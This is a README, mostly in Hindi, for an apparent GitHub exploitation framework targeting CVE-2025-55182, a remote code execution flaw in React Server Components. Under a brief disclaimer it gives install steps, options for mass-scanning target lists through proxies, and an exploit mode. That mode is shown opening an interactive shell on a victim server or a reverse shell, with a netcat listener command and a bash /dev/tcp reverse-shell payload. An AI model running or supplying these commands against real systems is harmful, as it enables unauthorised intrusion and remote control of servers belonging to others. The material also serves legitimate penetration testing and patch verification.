
React सर्वर घटकों के लिए महत्वपूर्ण RCE भेद्यता स्कैनर (CVE-2025-55182)। मल्टी-पेलोड समर्थन, प्रॉक्सी क्षमताओं और इंटरैक्टिव कमांड निष्पादन के साथ स्वचालित शोषण ढांचा।
[!Warning] यह रिपॉजिटरी केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है।
- प्रदान किए गए PoCs का उपयोग केवल उन सिस्टमों पर करें जो आपके स्वामित्व में हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।
- अनधिकृत पहुंच, शोषण, या इस रिपॉजिटरी में किसी भी सामग्री का दुरुपयोग अवैध है।
- लेखक किसी भी क्षति, दुरुपयोग, या अनुचित उपयोग से उत्पन्न कानूनी परिणामों की कोई जिम्मेदारी नहीं लेते।
CVE-2025-55182 एक गंभीर दूरस्थ कोड निष्पादन भेद्यता है जो React Server Components के संस्करणों 19.0.0, 19.1.0, 19.1.1 और 19.2.0 को प्रभावित करती है। यह भेद्यता HTTP अनुरोध पेलोड को सर्वर फंक्शन एंडपॉइंट्स पर असुरक्षित डिसीरियलाइज़ेशन के कारण उत्पन्न होती है, जिससे अप्रमाणित हमलावर दूरस्थ रूप से मनमाना कोड निष्पादित कर सकते हैं।
CVE आईडी: CVE-2025-55182
प्रभावित संस्करण:
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]
| तर्क | विवरण |
|---|---|
-d, --detection | डिटेक्शन मोड में चलाएं (भेद्यताओं के लिए स्कैन करें) |
-e, --exploit | एक्सप्लॉइटेशन मोड में चलाएं (एकल लक्ष्य का शोषण करें) |
-u, --url URL | स्कैन/एक्सप्लॉइट करने के लिए एकल लक्ष्य URL |
-l, --list FILE | लक्ष्य URL की सूची वाली फ़ाइल (केवल डिटेक्शन मोड) |
-p, --proxy URL | एकल प्रॉक्सी URL (जैसे, http://127.0.0.1:8080) |
-pl, --proxy-list FILE | प्रॉक्सी URL की सूची वाली फ़ाइल (प्रति पंक्ति एक) |
-t, --threads N | समवर्ती थ्रेड्स की संख्या (डिफ़ॉल्ट: 10, केवल डिटेक्शन मोड) |
-s, --silent | साइलेंट मोड - केवल भेद्य लक्ष्य दिखाएं (केवल डिटेक्शन मोड) |
-o, --output [FILE] | भेद्य लक्ष्यों को फ़ाइल में सहेजें (केवल डिटेक्शन मोड). यदि कोई फ़ाइल नाम नहीं दिया गया है, तो डिफ़ॉल्ट: CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt |
--debug | डीबग लॉगिंग सक्षम करें - प्रतिक्रिया विवरण और पुनर्प्रयास प्रयास दिखाता है (साइलेंट मोड में उपलब्ध नहीं) |
python3 main.py -d -u https://example.com
python3 main.py -d -l targets.txt
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080
python3 main.py -d -l targets.txt -s
python3 main.py -d -l targets.txt -t 20
python3 main.py -e -u https://vulnerable-site.com
Then select [i] for interactive shell:
Choose exploitation method:
[i] Interactive shell
[r] Reverse shell
Enter your choice (i/r): i
shell> whoami
ec2-user
shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)
shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...
shell> exit
python3 main.py -e -u https://vulnerable-site.com
Then select [r] for reverse shell and choose payload type:
Choose exploitation method:
[i] Interactive shell
[r] Reverse shell
Enter your choice (i/r): r
Choose payload option:
[d] Use default payloads (Try multiple reverse shells)
[c] Provide custom payload
Enter your choice (d/c): d
Enter your IP and port in this format:
Example: 192.168.1.100:4444
IP:PORT> 192.168.1.100:4444
Setup your listener with this command:
nc -lvnp 4444
Press ENTER when your listener is ready...
The tool will automatically try 17+ different reverse shell payloads until one succeeds.
Enter your choice (d/c): c
Enter your custom reverse shell payload:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1